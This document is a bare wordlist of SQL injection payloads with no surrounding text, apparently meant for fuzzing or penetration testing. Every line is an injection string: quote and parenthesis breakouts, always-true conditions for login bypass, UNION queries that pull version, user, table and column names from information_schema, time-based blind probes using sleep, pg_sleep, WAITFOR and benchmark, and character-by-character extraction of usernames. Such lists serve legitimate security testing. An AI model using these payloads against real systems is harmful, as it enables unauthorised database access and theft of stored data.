'
"
`
')
")
`)
'))
"))
`))
';
";
`;
');
");
`);
'));
"));
`));
'--
"--
`--
')--
")--
`)--
'))--
"))--
`))--
';--
";--
`;--
');--
");--
`);--
'));--
"));--
`));--
'/*
"/*
`/*
')/*
")/*
`)/*
'))/*
"))/*
`))/*
';/*
";/*
`;/*
');/*
");/*
`);/*
'));/*
"));/*
`));/*
' OR '1'='1
" OR "1"="1
` OR `1`=`1
' OR '1'='1'--
" OR "1"="1"--
` OR `1`=`1`--
' OR 1=1--
" OR 1=1--
` OR 1=1--
' OR 1=1#
" OR 1=1#
` OR 1=1#
' OR 1=1/*
" OR 1=1/*
` OR 1=1/*
') OR ('1'='1
") OR ("1"="1
`) OR (`1`=`1
') OR ('1'='1')--
") OR ("1"="1")--
`) OR (`1`=`1`)--
') OR (1=1)--
") OR (1=1)--
`) OR (1=1)--
') OR (1=1)#
") OR (1=1)#
`) OR (1=1)#
') OR (1=1)/*
") OR (1=1)/*
`) OR (1=1)/*
'OR 1=1--
"OR 1=1--
`OR 1=1--
' UNION SELECT NULL--
" UNION SELECT NULL--
` UNION SELECT NULL--
') UNION SELECT NULL--
") UNION SELECT NULL--
`) UNION SELECT NULL--
' UNION SELECT NULL,NULL--
" UNION SELECT NULL,NULL--
` UNION SELECT NULL,NULL--
') UNION SELECT NULL,NULL--
") UNION SELECT NULL,NULL--
`) UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL--
` UNION SELECT NULL,NULL,NULL--
') UNION SELECT NULL,NULL,NULL--
") UNION SELECT NULL,NULL,NULL--
`) UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
" UNION SELECT 1,2,3--
` UNION SELECT 1,2,3--
') UNION SELECT 1,2,3--
") UNION SELECT 1,2,3--
`) UNION SELECT 1,2,3--
' AND 1=1--
" AND 1=1--
` AND 1=1--
') AND 1=1--
") AND 1=1--
`) AND 1=1--
' AND 1=2--
" AND 1=2--
` AND 1=2--
') AND 1=2--
") AND 1=2--
`) AND 1=2--
' AND 1=1#
" AND 1=1#
` AND 1=1#
') AND 1=1#
") AND 1=1#
`) AND 1=1#
' AND 1=2#
" AND 1=2#
` AND 1=2#
') AND 1=2#
") AND 1=2#
`) AND 1=2#
' UNION SELECT @@version--
" UNION SELECT @@version--
` UNION SELECT @@version--
') UNION SELECT @@version--
") UNION SELECT @@version--
`) UNION SELECT @@version--
' UNION SELECT user(),database()--
" UNION SELECT user(),database()--
` UNION SELECT user(),database()--
') UNION SELECT user(),database()--
") UNION SELECT user(),database()--
`) UNION SELECT user(),database()--
' UNION SELECT table_name,table_schema FROM information_schema.tables--
" UNION SELECT table_name,table_schema FROM information_schema.tables--
` UNION SELECT table_name,table_schema FROM information_schema.tables--
') UNION SELECT table_name,table_schema FROM information_schema.tables--
") UNION SELECT table_name,table_schema FROM information_schema.tables--
`) UNION SELECT table_name,table_schema FROM information_schema.tables--
' UNION SELECT column_name,table_name FROM information_schema.columns--
" UNION SELECT column_name,table_name FROM information_schema.columns--
` UNION SELECT column_name,table_name FROM information_schema.columns--
') UNION SELECT column_name,table_name FROM information_schema.columns--
") UNION SELECT column_name,table_name FROM information_schema.columns--
`) UNION SELECT column_name,table_name FROM information_schema.columns--
' OR 'a'='a
" OR "a"="a
` OR `a`=`a
' OR 'a'='a'--
" OR "a"="a"--
` OR `a`=`a`--
' OR sleep(5)--
" OR sleep(5)--
` OR sleep(5)--
') OR sleep(5)--
") OR sleep(5)--
`) OR sleep(5)--
' OR benchmark(10000000,MD5(1))--
" OR benchmark(10000000,MD5(1))--
` OR benchmark(10000000,MD5(1))--
') OR benchmark(10000000,MD5(1))--
") OR benchmark(10000000,MD5(1))--
`) OR benchmark(10000000,MD5(1))--
' OR pg_sleep(5)--
" OR pg_sleep(5)--
` OR pg_sleep(5)--
') OR pg_sleep(5)--
") OR pg_sleep(5)--
`) OR pg_sleep(5)--
' WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
` WAITFOR DELAY '0:0:5'--
') WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
`) WAITFOR DELAY '0:0:5'--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
" AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
` AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
') AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
") AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
`) AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' OR EXISTS(SELECT * FROM users WHERE username='admin')--
" OR EXISTS(SELECT * FROM users WHERE username="admin")--
` OR EXISTS(SELECT * FROM users WHERE username=`admin`)--
') OR EXISTS(SELECT * FROM users WHERE username='admin')--
") OR EXISTS(SELECT * FROM users WHERE username="admin")--
`) OR EXISTS(SELECT * FROM users WHERE username=`admin`)--
' AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97--
" AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97--
` AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97--
') AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97--
") AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97--
`) AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97--
' LIKE '%
" LIKE "%
` LIKE `%
') LIKE '%
") LIKE "%
`) LIKE `%
' UNION ALL SELECT NULL--
" UNION ALL SELECT NULL--
` UNION ALL SELECT NULL--
') UNION ALL SELECT NULL--
") UNION ALL SELECT NULL--
`) UNION ALL SELECT NULL--
' AND 8=8--
" AND 8=8--
` AND 8=8--
') AND 8=8--
") AND 8=8--
`) AND 8=8--
' AND 8=9--
" AND 8=9--
` AND 8=9--
') AND 8=9--
") AND 8=9--
`) AND 8=9--
' xor sleep(5) #
" xor sleep(5) #
` xor sleep(5) #
') xor sleep(5) #
") xor sleep(5) #
`) xor sleep(5) #
' LIMIT 1--
" LIMIT 1--
` LIMIT 1--
') LIMIT 1--
") LIMIT 1--
`) LIMIT 1--